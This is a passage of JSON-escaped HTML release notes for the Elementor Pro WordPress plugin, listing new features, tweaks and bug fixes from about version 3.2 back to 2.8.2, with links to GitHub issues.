href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7956\\\">#7956<\\/a>)<\\/li>\\n<li>Tweak: Adjusted \'Max Height\' control range in Table of Contents widget<\\/li>\\n<li>Tweak: Changed descriptive text in Create Custom Code screen<\\/li>\\n<li>Tweak: Added support for dynamic capabilities in Code Highlight widget<\\/li>\\n<li>Tweak: Added support for future load on demand for <code>share-link<\\/code> library<\\/li>\\n<li>Tweak: Added support for future load on demand for <code>dialog<\\/code> library in Popup<\\/li>\\n<li>Tweak: Allow overwriting the assets URL when using a mirror domain<\\/li>\\n<li>Fix: Animation was triggered multiple times when accessing the viewport in certain cases in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13951\\\">#13951<\\/a>)<\\/li>\\n<li>Fix: Location is not being updated after a Custom Code snippet is published (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13971\\\">#13971<\\/a>)<\\/li>\\n<li>Fix: Custom Fonts CSS files were not updated after regenerating CSS files<\\/li>\\n<li>Fix: Conditions modal is not responsive in Custom Code<\\/li>\\n<li>Fix: Empty order buttons are displayed in Custom Fonts screen<\\/li>\\n<li>Fix: Typo in \'Reply To\' Email action after submit placeholder in Forms widget<\\/li>\\n<li>Fix: Unnecessary Save Draft button in Custom Code<\\/li>\\n<li>Fix: RTL glitches in Custom Code<\\/li>\\n<li>Fix: Sanitized options in the editor to enforce better security policies<\\/li>\\n<li>Deprecated: See all deprecations to this version in our (<a href=\\\"https:\\/\\/developers.elementor.com\\/v3-2-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.1.1 - 2021-02-23<\\/h4>\\n<ul>\\n<li>Tweak: Adjusted \'Max Height\' control range in Table of Contents widget<\\/li>\\n<li>Fix: Popup event handler is undefined (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11475]\\\">#11475<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10690\\\">#10690<\\/a>)<\\/li>\\n<li>Fix: Conditions modal is not responsive in Custom Code<\\/li>\\n<li>Fix: RTL glitches in Code Highlight widget<\\/li>\\n<li>Fix: Minor UI glitches in Code Highlight widget<\\/li>\\n<li>Fix: Users can\'t get Pro Developer Edition version updates<\\/li>\\n<\\/ul>\\n<h4>3.1.0 - 2021-02-13<\\/h4>\\n<ul>\\n<li>New: Introducing Custom Code - Add custom code snippets to your site, including <code>head<\\/code>, <code>body<\\/code> start and <code>body<\\/code> end<\\/li>\\n<li>New: Meet Code Highlight widget - showcase any syntax with highlighted UI (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5815\\\">#5815<\\/a>)<\\/li>\\n<li>Experiment: Improved Pro widgets performance by loading JS and Swiper assets conditionally in frontend (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8572\\\">#8572<\\/a>, <a href=\\\"https:\\/\\/developers.elementor.com\\/experiment-optimized-asset-loading\\/\\\">Developer Documentation<\\/a>)<\\/li>\\n<li>Tweak: Added Compatibility Tag support in Elementor Pro (<a href=\\\"https:\\/\\/developers.elementor.com\\/compatibility-tag\\/\\\">Developer Documentation<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities to Rotating Text animation in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4625\\\">#4625<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8569\\\">#8569<\\/a>)<\\/li>\\n<li>Tweak: Added an option to set Selected color for Typing effect in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5403\\\">#5403<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7826\\\">#7826<\\/a>)<\\/li>\\n<li>Tweak: Added animation Loop option for Animated Headline (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9749\\\">#9749<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2457\\\">#2457<\\/a>)<\\/li>\\n<li>Tweak: Added timing options for Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4392\\\">#4392<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities for Testimonial Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8569\\\">#8569<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities for Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4242\\\">#4242<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8569\\\">#8569<\\/a>)<\\/li>\\n<li>Tweak: Added Word Wrap control to Code Highlight widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13577\\\">#13577<\\/a>)<\\/li>\\n<li>Tweak: Upgraded Font Awesome Pro library to v5.15.1<\\/li>\\n<li>Tweak: Improved method of loading field mapping repeater in Form widget (<a href=\\\"https:\\/\\/developers.elementor.com\\/how-to-add-a-repeater-control-to-elementor-add-on\\/\\\">Developer Documentation<\\/a>)<\\/li>\\n<li>Tweak: Added "Show on Browsers" Popup Advanced Rule<\\/li>\\n<li>Tweak: Added real-time JS handling to prevent redundant renders in Slides widget and all Carousel widgets<\\/li>\\n<li>Tweak: Import scroll utility from core and remove it from Pro<\\/li>\\n<li>Tweak: Added alignment options for Post Excerpt widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9757\\\">#9757<\\/a>)<\\/li>\\n<li>Tweak: Changed alignment control to work with selectors in Share Buttons<\\/li>\\n<li>Tweak: Upgraded to Webpack 5, Grunt-Webpack 4 and TerserPlugin instead of UglifyJsPlugin<\\/li>\\n<li>Fix: Steps Divider is not vertically aligned in Multi Step Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12569\\\">#12569<\\/a>)<\\/li>\\n<li>Fix: Slides are playing in an infinite loop mode even when the option is disabled in Slides Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6726\\\">#6726<\\/a>)<\\/li>\\n<li>Fix: Redundant spacing is added to Share Buttons widget<\\/li>\\n<li>Fix: Step buttons text is not updated without a page reload in Forms widget<\\/li>\\n<li>Fix: Overflow issue in certain animations in Animated Headline widget<\\/li>\\n<li>Fix: When dragging a new Testimonial Carousel there is a console error thrown<\\/li>\\n<li>Fix: Step Buttons are cut in mobile view in Multi Step Form<\\/li>\\n<li>Fix: Submit and Step buttons size differences when using Twenty Twenty theme<\\/li>\\n<li>Fix: Duplicate button Text Color control in Slides widget<\\/li>\\n<li>Fix: JS error is thrown when editing and saving global widgets<\\/li>\\n<li>Fix: <code>get_version<\\/code> API function may fail with Redis \\/ DB cache<\\/li>\\n<li>Fix: Multiple license check requests are created in certain cases<\\/li>\\n<li>Deprecated: Deprecate methods prefixed with an underscore and replace them with unprefixed methods<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-1-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>3.0.10 - 2021-01-20<\\/h4>\\n<ul>\\n<li>Tweak: Added Editing Handles string translation compatibility with Elementor v3.1.0<\\/li>\\n<\\/ul>\\n<h4>3.0.9 - 2020-12-29<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility to support Elementor 3.1.0<\\/li>\\n<li>Fix: Wrong phrasing of Import template success message in Theme Builder<\\/li>\\n<li>Fix: Border color glitch in Theme Builder<\\/li>\\n<\\/ul>\\n<h4>3.0.8 - 2020-11-26<\\/h4>\\n<ul>\\n<li>Fix: Navigation arrows UI glitch in Media Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13172\\\">#13172<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.0.7 - 2020-11-25<\\/h4>\\n<ul>\\n<li>Fix: Console Error when dragging Testimonials Carousel widget<\\/li>\\n<li>Fix: Arrows of Testimonial and Reviews Carousel widgets navigate to the wrong direction in RTL websites<\\/li>\\n<li>Fix: Removed the conditional loading of Webpack<\\/li>\\n<li>Fix: Fatal error is thrown after deleting an associated custom taxonomy when Posts widget with Cards skin has a badge<\\/li>\\n<li>Fix: Upload JSON files only when the user allowed to prevent security issues<\\/li>\\n<li>Fix: Gallery not displayed in Theme Builder templates preview<\\/li>\\n<\\/ul>\\n<h4>3.0.6 - 2020-11-04<\\/h4>\\n<ul>\\n<li>Tweak: Updated the embedded post in Facebook Embed widget<\\/li>\\n<li>Fix: Minor UI glitches in Theme Builder\'s conditions screen footer<\\/li>\\n<li>Fix: Template type changes into Single Page after conditions change in Theme Builder<\\/li>\\n<li>Fix: Redundant Custom Caption option in Site Logo widget<\\/li>\\n<li>Fix: Removed unused code in Drip integration<\\/li>\\n<li>Fix: Removed Weibo and WeChat social networks due to website and links inactivity from Share Buttons widget<\\/li>\\n<li>Fix: Removed redundant code from Portfolio and Post Navigation widgets<\\/li>\\n<\\/ul>\\n<h4>3.0.5 - 2020-09-23<\\/h4>\\n<ul>\\n<li>Fix: If the default page layout is set to "Canvas" Headers and Footers cannot be edited<\\/li>\\n<li>Fix: Product Image Dynamic Tag throws an error when no image is set<\\/li>\\n<li>Fix: Missing Single document placeholder in Theme Builder<\\/li>\\n<li>Fix: Document editing handles inherit the <code>font-family<\\/code> from 3rd party source<\\/li>\\n<li>Fix: Can\'t add linebreaks to Textarea input when used as Multi Step Form<\\/li>\\n<li>Fix: Incorrect width in Facebook Page widget<\\/li>\\n<li>Fix: Added compatibility to allow the use of \'get_create_url\' in Theme Builder<\\/li>\\n<\\/ul>\\n<h4>3.0.4 - 2020-09-09<\\/h4>\\n<ul>\\n<li>Fix: Autogenerated screenshots appear in WP Media Library modal (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12304\\\">#12304<\\/a>)<\\/li>\\n<li>Fix: Make sure Elementor Posts widget Pagination doesn\'t interfere with 3rd party plugins (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12126\\\">#12126<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12127\\\">#12127<\\/a>)<\\/li>\\n<li>Fix: Shrinking conditions indicator in Theme Builder<\\/li>\\n<li>Fix: Column can\'t be dragged and dropped if it populates a Global widget<\\/li>\\n<li>Fix: Styles are missing from Single templates in some edge cases<\\/li>\\n<\\/ul>\\n<h4>3.0.3 - 2020-09-02<\\/h4>\\n<ul>\\n<li>Fix: Pagination doesn\'t work in WordPress 5.5 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12126\\\">#12126<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12127\\\">#12127<\\/a>)<\\/li>\\n<li>Fix: Change delete template action to "Move to Trash" in the new Theme Builder view<\\/li>\\n<\\/ul>\\n<h4>3.0.2 - 2020-08-31<\\/h4>\\n<ul>\\n<li>Tweak: Replaced WordPress "Learn More" links with dynamic links for better control over time (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12312\\\">#12312<\\/a>)<\\/li>\\n<li>Tweak: UI tweaks to the Conditions screen In the new Theme Builder<\\/li>\\n<li>Fix: Motion Effects not working when assigned to a column and throws JS error when DOM optimization is disabled (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12299\\\">#12299<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12275\\\">#12275<\\/a>)<\\/li>\\n<li>Fix: Multiple Galleries display all the images in the Lightbox slideshow (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11809\\\">#11809<\\/a>)<\\/li>\\n<li>Fix: Old Theme Builder is being opened when accessing through the Finder<\\/li>\\n<li>Fix: Mixed templates import glitch in Theme Builder<\\/li>\\n<li>Fix: Card icon sizes in Theme Builder<\\/li>\\n<li>Fix: Preview button leads to <code>render_mode<\\/code> instead of preview when importing a template from the new Theme Builder<\\/li>\\n<\\/ul>\\n<h4>3.0.1 - 2020-08-26<\\/h4>\\n<ul>\\n<li>Tweak: Keep previous Theme Builder when accessing from the WP Dashboard for legacy support<\\/li>\\n<li>Tweak: Updated video tutorials in Theme Builder<\\/li>\\n<li>Tweak: Don\'t show auto-screenshots in the Media Library (Props <a href=\\\"https:\\/\\/github.com\\/black-eye\\\">@black-eye<\\/a>)<\\/li>\\n<li>Fix: Repeater items throws <code>childView<\\/code> is undefined message in Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12239\\\">#12239<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12221\\\">#12221<\\/a>)<\\/li>\\n<li>Fix: Misspelling of the word "occurred" in Form widget default error message (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12137\\\">#12137<\\/a>)<\\/li>\\n<li>Fix: Facebook comments not showing up (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12157\\\">#12157<\\/a>)<\\/li>\\n<li>Fix: Check for conflicts in Theme Builder doesn\'t work properly<\\/li>\\n<li>Fix: Minor UI fixes in Theme Builder<\\/li>\\n<li>Fix: Dark mode glitches in Theme Builder<\\/li>\\n<li>Fix: Global Site Part toaster appears when you publish a Popup<\\/li>\\n<li>Fix: Site Parts aren\'t in the correct order in Theme Builder<\\/li>\\n<li>Fix: Date field caused forms to get corrupted in Forms widget<\\/li>\\n<li>Fix: Theme Builder application page is forbidden<\\/li>\\n<\\/ul>\\n<h4>3.0.0 - 2020-08-23<\\/h4>\\n<ul>\\n<li>New: Introducing the new and improved Theme Builder<\\/li>\\n<li>Tweak: Removed <code>.elementor-inner<\\/code> and <code>.elementor-column-wrap<\\/code> from DOM output to improve performance (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7351\\\">#7351<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7817\\\">#7817<\\/a>, <a href=\\\"https:\\/\\/developers.elementor.com\\/dom-improvements-ahead-html-wrappers-removal-from-v3-0\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added contextual anchors ID support to Table of Contents widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10052\\\">#10052<\\/a>)<\\/li>\\n<li>Tweak: Added WeChat and Weibo social networks to Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11554\\\">#11554<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities for Redirect after Login\\/Logout in Login widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11343\\\">#11343<\\/a>)<\\/li>\\n<li>Tweak: Added Blend Mode and CSS Filters controls to adjust the Background Overlay in Flipbox widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11653\\\">#11653<\\/a>)<\\/li>\\n<li>Tweak: Added responsive capabilities to Toggle Button styling in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8269\\\">#8269<\\/a>)<\\/li>\\n<li>Tweak: Added responsive Text Alignment control in Call to Action widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11968\\\">#11968<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic content to Ribbon element in Call to Action widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10364\\\">#10364<\\/a>)<\\/li>\\n<li>Tweak: Converted uses of Color and Typography Schemes to Global Colors and Fonts<\\/li>\\n<li>Tweak: Separated Title and Description control fields labels in Call to Action widget<\\/li>\\n<li>Tweak: Removed unnecessary style in WC Product with variations<\\/li>\\n<li>Tweak: Converted Portfolio, Posts and Share Buttons widgets to use CSS Variable-based Elementor Grid (<a href=\\\"https:\\/\\/developers.elementor.com\\/elementor-dropping-support-ie\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added Date Modified option to Posts widget metadata<\\/li>\\n<li>Fix: PHP 7.4 compatibility to Media Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11355\\\">#11355<\\/a>)<\\/li>\\n<li>Fix: Divider alignment issue in Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11628\\\">#11628<\\/a>)<\\/li>\\n<li>Fix: Color doesn\\u2019t change in Products Archive Description widget<\\/li>\\n<li>Fix: WC Product variations layout breaks when using Variation Swatches plugin<\\/li>\\n<li>Fix: WC Product variations layout issue<\\/li>\\n<li>Fix: WC Product variations mobile zoom-in glitch<\\/li>\\n<li>Fix: Can\'t edit a Popup after accessing Theme Style<\\/li>\\n<li>Fix: Twitter icon missing in Blockquote widget<\\/li>\\n<li>Fix: Removed redundant default text color from Share Buttons minimal skin<\\/li>\\n<li>Fix: UI glitch in Display Conditions modal<\\/li>\\n<li>Fix: Insert template button UI glitch in Templates Library<\\/li>\\n<li>Fix: Added sanitization to post titles in WordPress dashboard for better security<\\/li>\\n<li>Fix: Show when arriving from search engines rule doesn\'t work in Popup<\\/li>\\n<li>Fix: Child categories are shown with a different parent category in Query control<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-0-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>2.10.3 - 2020-06-29<\\/h4>\\n<ul>\\n<li>Fix: Form not being submitted when using "Progress Bar" and "None" view types in Multi Step Form (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11596\\\">#11596<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11610\\\">#11610<\\/a>)<\\/li>\\n<li>Fix: Missing "for" attribute in Password field label in Login widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8646\\\">#8646<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.10.2 - 2020-06-16<\\/h4>\\n<ul>\\n<li>Fix: Run step events only when in Multi Step Form mode (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11644\\\">#11644<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.10.1 - 2020-06-16<\\/h4>\\n<ul>\\n<li>Tweak: Improved License validation mechanism to avoid limitations<\\/li>\\n<li>Tweak: Changed control labels and ordering in Price Table, Lottie and Form widgets<\\/li>\\n<li>Fix: Popup close button vertical position glitch (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10921\\\">#10921<\\/a>)<\\/li>\\n<li>Fix: Radio field placement glitch when in Multi Step mode in Form widget<\\/li>\\n<li>Fix: Clicking <code>Enter<\\/code> key submits the form in Multi Step Form<\\/li>\\n<li>Fix: Hardened sanitization in Custom Attributes to avoid security issues<\\/li>\\n<\\/ul>\\n<h4>2.10.0 - 2020-06-07<\\/h4>\\n<ul>\\n<li>New: Introducing Multi-Step Forms - Breakdown long forms into simple steps (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5975\\\">#5975<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3911\\\">#3911<\\/a>)<\\/li>\\n<li>New: Introducing Lottie widget - easily add Lottie animations to your site, no coding needed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11026\\\">#11026<\\/a>)<\\/li>\\n<li>Tweak: Added spacing option to Posts widget pagination (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5682\\\">#5682<\\/a>)<\\/li>\\n<li>Tweak: Changed texts and logic for administrator plugin renewal notices<\\/li>\\n<li>Tweak: Added new Scroll Util for improved scrolling handling<\\/li>\\n<li>Tweak: Improved Motion Effects animation performance<\\/li>\\n<\\/ul>\\n<h4>2.9.5 - 2020-05-24<\\/h4>\\n<ul>\\n<li>Fix: Added sanitization to Custom Attributes control to avoid security issue<\\/li>\\n<\\/ul>\\n<h4>2.9.4 - 2020-05-07<\\/h4>\\n<ul>\\n<li>Fix: Hardened user role that is allowed to upload icon sets and unzip only allowed files in Custom Icons to prevent security vulnerability<\\/li>\\n<\\/ul>\\n<h4>2.9.3 - 2020-04-19<\\/h4>\\n<ul>\\n<li>Fix: Form shortcode IDs are not wrapped in double-quotes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11023\\\">#11023<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10932\\\">#10932<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10967\\\">#10967<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11000\\\">#11000<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11049\\\">#11049<\\/a>)<\\/li>\\n<li>Fix: Escaped Form records metadata to prevent security vulnerability<\\/li>\\n<li>Fix: Closing "Save Changes" document confirmation modal causes Panel infinite loading<\\/li>\\n<li>Fix: Ken Burns effect not working when there is only one slide in Slides widget<\\/li>\\n<li>Fix: Document handles UI glitch<\\/li>\\n<\\/ul>\\n<h4>2.9.2 - 2020-03-25<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility with WordPress v5.4 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10745\\\">#10745<\\/a>)<\\/li>\\n<li>Fix: Image ratio number is displayed under the Archive Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10874\\\">#10874<\\/a>)<\\/li>\\n<li>Fix: Theme Style Link color setting overrides the Table of Content list style<\\/li>\\n<li>Fix: PHP notice when using dynamic user info <code>id<\\/code><\\/li>\\n<li>Fix: Navigation arrows direction is crossed on first drag in Slides Widget<\\/li>\\n<li>Fix: "No headings were found on this page" message was not displayed in the frontend in Table of Contents widget<\\/li>\\n<li>Fix: Container includes Popup tags by default in Table of Contents widget<\\/li>\\n<li>Fix: Twitter icon display issue when Font Awesome 4 support is disabled in Blockquote widget<\\/li>\\n<li>Fix: ACF Dynamic tag not working in Form widget Redirect action<\\/li>\\n<\\/ul>\\n<h4>2.9.1 - 2020-03-16<\\/h4>\\n<ul>\\n<li>Fix: Can\'t access Elementor Editor when there is Page Title widget in the page<\\/li>\\n<li>Fix: Applying styling to Post Content widget affects the Page and Post editing handles<\\/li>\\n<\\/ul>\\n<h4>2.9.0 - 2020-03-15<\\/h4>\\n<ul>\\n<li>New: Introducing Full Site Editing: Design header, footer, and content all in one place! (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4985\\\">#4985<\\/a>)<\\/li>\\n<li>New: Added Global Custom CSS for Your Entire Site in Theme Style (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3345\\\">#3345<\\/a>)<\\/li>\\n<li>New: Added Dynamic Colors tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6485\\\">#6485<\\/a>)<\\/li>\\n<li>Tweak: Added option to set the Site Part HTML Wrapper Tags (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9293\\\">#9293<\\/a>)<\\/li>\\n<li>Tweak: Added Link Attributes support to Pro widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5716\\\">#5716<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3642\\\">#3642<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9225\\\">#9225<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9079\\\">#9079<\\/a>)<\\/li>\\n<li>Tweak: Added Theme Style support in Theme Builder parts (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10564\\\">#10564<\\/a>)<\\/li>\\n<li>Tweak: Avoid creating empty Custom Font<\\/li>\\n<li>Tweak: Added <code>aria-expanded<\\/code> attribute to Menu Cart widget<\\/li>\\n<li>Tweak: Moved Link Actions module to Core plugin<\\/li>\\n<li>Tweak: Changed the name of \\u201cTypeKit Web Fonts by Adobe\\u201d to \\u201cAdobe Fonts\\u201d<\\/li>\\n<li>Tweak: Removed redundant display conditions from Blockquote, Flipbox, Price Table, and Search Form widgets<\\/li>\\n<li>Tweak: Pro widgets are not draggable unless Elementor license has been activated<\\/li>\\n<li>Tweak: Remove redundant <code>label_block<\\/code> parameters from several controls<\\/li>\\n<li>Tweak: Converted controls selectors to CSS variables in Gallery widget<\\/li>\\n<li>Tweak: Replaced Stumbleupon with Mix in Reviews widget recommended icons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10099\\\">#10099<\\/a>)<\\/li>\\n<li>Tweak: Added Mix to the Share Buttons network list (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10099\\\">#10099<\\/a>)<\\/li>\\n<li>Tweak: Added "Open in new tab" option to Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7924\\\">#7924<\\/a>)<\\/li>\\n<li>Tweak: Upgraded Font Awesome Pro library to v5.12.0<\\/li>\\n<li>Tweak: Added new Lightbox compatibility for Gallery and Media Carousel widgets<\\/li>\\n<li>Tweak: Expose external API for Swiper instances<\\/li>\\n<li>Tweak: Added compatibility to JS API in Theme Builder, Popups, Form widget and Global widget<\\/li>\\n<li>Tweak: Replaced nerd icons with new Elementor emojis<\\/li>\\n<li>Tweak: Added specific <code>color<\\/code> attribute to header title in Table of Contents widget<\\/li>\\n<li>Fix: Line break issues in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10585\\\">#10585<\\/a>)<\\/li>\\n<li>Fix: Theme Style Link color overrides the Table of Content list style<\\/li>\\n<li>Fix: Active state glitches when using Table of contents widget with Sticky mode<\\/li>\\n<li>Fix: "Graphic Element" section appears as empty in case of unmarked Graphic Element in Call to Action widget<\\/li>\\n<li>Fix: Page Title widget render glitches in the Editor<\\/li>\\n<li>Fix: Image ratio parameter visible in some edge cases in Posts widget<\\/li>\\n<li>Fix: Image missing when sharing to Pinterest using Share Buttons widget<\\/li>\\n<li>Fix: Theme Style Link color setting override the list style in Table of Contents widget<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v2-9-0-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>2.8.5 - 2020-03-08<\\/h4>\\n<ul>\\n<li>Tweak: Added new Swiper parameter to all Pro carousels to allow 3rd party integration<\\/li>\\n<li>Fix: Missing closing bracket in Animated Headline widget<\\/li>\\n<li>Fix: Share buttons widgets show Font Awesome 4 icons on first drag in Editor<\\/li>\\n<\\/ul>\\n<h4>2.8.4 - 2020-02-16<\\/h4>\\n<ul>\\n<li>Tweak: Added Lightbox Title & Description support to Gallery widget<\\/li>\\n<li>Tweak: Added RTL support for Slides widget<\\/li>\\n<li>Tweak: Display Lightbox images in Full size in Gallery widget<\\/li>\\n<li>Fix: Template with Slides widget not working properly when placed inside Tabs, Accordion and Toggle widget<\\/li>\\n<li>Fix: Dropdown menu lost styling after Elementor Pro v2.8 upgrade in Nav Menu widget<\\/li>\\n<li>Fix: Indent doesn\'t work on RTL websites in Table of Contents widget<\\/li>\\n<li>Fix: Query Control throws <code>Undefined index: q<\\/code> error<\\/li>\\n<li>Fix: Typography control not affecting dropdown menu in Nav Menu widget<\\/li>\\n<li>Fix: Discord forms integration fails to send submissions in some server configurations<\\/li>\\n<li>Fix: Rotating headlines don\'t align center in Animated Headline widget<\\/li>\\n<li>Fix: Custom secondary color displayed when not needed in Share buttons widget<\\/li>\\n<li>Fix: Motion Effects of certain objects are not functioning properly on Safari browser<\\/li>\\n<li>Fix: Missing eye icon in Single template footer preview button<\\/li>\\n<\\/ul>\\n<h4>2.8.3 - 2020-01-01<\\/h4>\\n<ul>\\n<li>Tweak: Updated Table of Contents widget panel location<\\/li>\\n<li>Fix: ACF URL Dynamic field throws <code>undefined index<\\/code> PHP notice (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9929\\\">#9929<\\/a>)<\\/li>\\n<li>Fix: Gallery lightbox pagination shows images from all tabs<\\/li>\\n<li>Fix: "Reply To" option not working in Form widget "Email 2" Action<\\/li>\\n<li>Fix: ACF Dynamic tag not working in Form widget Redirect action<\\/li>\\n<li>Fix: Underline option not working in Table of Contents widget Normal state<\\/li>\\n<li>Fix: Query Control <code>Undefined index: autocomplete<\\/code> notice in some cases<\\/li>\\n<li>Fix: Missing display condition to Read More Spacing control in Posts widget<\\/li>\\n<\\/ul>\\n<h4>2.8.2 - 2019-12-19<\\/h4>\\n<ul>\\n<li>Tweak: Improved scroll-spy and collapsing functionality in Table of Contents widget<\\/li>\\n<li>Fix: "No products were found" message not being displayed in an empty Products Archive<\\/li>\\n<li>Fix: Redundant <code><br><\\/code> tags in Single theme template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9927\\\">#9927<\\/a>, <a 